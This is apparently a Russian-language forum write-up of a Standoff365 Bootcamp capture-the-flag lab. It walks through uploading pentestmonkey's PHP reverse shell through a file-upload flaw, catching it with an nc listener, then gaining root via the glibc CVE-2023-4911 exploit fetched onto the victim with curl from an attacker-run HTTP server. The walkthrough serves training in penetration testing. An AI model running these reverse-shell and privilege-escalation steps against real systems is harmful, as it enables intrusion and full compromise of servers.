CTF reference: Bootcamp (standoff365.com)
Сontents:
Web-1-1
-Step 1: Preparing
-Step 2: Gathering information
-Step 3: Attack
Web-1-2
Web-1-1
Step 1: Preparing
используем команду и добавляем следующие записи
Код:
sudo nano /etc/hosts
Код:
Код:
10.124.1.231 aircraft.edu.stf
10.124.1.232 calculator.edu.stf
10.124.1.233 library.edu.stf
10.124.1.234 wp.edu.stf
10.124.1.235 www.edu.stf
10.124.1.236 gallery.edu.stf
10.124.1.237 utils.edu.stf
10.124.1.238 shop.edu.stf
10.124.1.239 tokenizer.edu.stf
10.124.1.240 bind.edu.stf
10.124.1.241 smashmusic.edu.stf
10.124.1.242 test-webserver.edu.stf
10.124.1.253 vpn.edu.stf
Step 2: Gathering information
Переходим на страницу http://library.edu.stf/
и видим сылку на либу(нижний правый угол ), переходим на нее
Попадаем на следующий страничку с интерфейсом загрузки файлов.
Так зная что это за уязвимость(в названии задания php upload ) я сразу загуглил (это файл стандартный файл что можно использовать в таких рода заданиях)
in google
answer: GitHub - pentestmonkey/php-reverse-shell
Почему php? потому что расширение в браузере показывает какие есть языки на веб сервере
Далее следует скопировать файл, используя удобный способ, по следующему адресу:
php-reverse-shell.php.После загрузки файла откройте его для ознакомления .
Обратите внимание, что необходимо изменить значения IP-адреса и порта на свои собственные. Чтобы узнать свой IP-адрес, выполните команду ip a .
(И смотрим значение tun0 Так как нам нужно значение нашего айпи в ВПН(tun0 как раз и будет нашим впн), это важно)
В значении порт указывает тот порт что мы будем слушать через команду
Код:
rlwrap nc -lnvp YOUR PORT
или
Step 3: Attack
Теперь нужно провести нашу атаку.
(Перед атакой, вам нужно настроить burp proxy На вашей машинке . Погуглите. )
Перехватываем запрос на загрузку файлов. и меняем сдедующие параметры
Подробнее об уязвимостях этого функционала можно прочитать здесь:
- https://portswigger.net/web-security/file-upload (здесь можно выполнять задания по этой теме)
- https://book.hacktricks.xyz/pentesting-web/file-upload
После загрузки
Теперь нам нужно было запустить(выполнить) наш скрипт. Я нашел на сайте обычную картинку, посмотрел ее URL и понял, где искать свой файл.
В адресной строке я увидел что-то вроде:
Код:
http://library.edu.stf/wp-content/ch1.png
Изучив данный Url я получил представление где искать наши(-у) картинки
http://library.edu.stf/wp-content/shell33.php
Преждем чем его вызвать не забудьте включить
nc -lnvp 4545
(4545 это порт что был в нашем скрипте)
Если вы все сделали правильно то вы увидите
Далее по заданию запускаем скрипт и получаем флаг
web-1-2 Lpe
Повышение привилегий на линукс довольная большая тема, и проверяемая различные векторы атак я наткнулся на нужный нам
Проверяем версию
Вывод будет примерно таким:
Код:
Код:
ldd (Ubuntu GLIBC 2.35-0ubuntu3.4) 2.35
Copyright (C) 2022 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.
There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A
PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.
Загуглив
Нашел следующий эксплоит CVE-2023-4911
Проверьте, находится ли версия glibc в диапазоне от 2.34 до 2.39. Если да, то ваш сервер уязвим.
(не скину ссылку на уязвимость так как той которой я пользовался.... была удаленна с gihub ... печально )
После того как вы нашли нужный poc его стоит скачать на вашу машину , а после и на машину жертвы
Запускаем питон сервер на нашей машине, в той же папке и где наш эксплоит
Код:
python3 -m http.server 4646
На машине жертвы :
переходим в каталог /var/www/html/wordpress
Используем Curl -O Для скачивания и флаг -O для сохранения этих файлов
Код:
curl -O http://:4646/exp.c
Код:
curl -O http://:4646/libc.py
Выдаем права за запуск всем файлам
По инструкции с github запускам
и компилим наш эксплоит
Даллее запускаем
если все прошло успешно проверям наши права через команду Id
Код:
id uid=0(root) gid=33(www-data) groups=33(www-data)
И запускаем последний скрипт для получения второго файла
Линейный вид
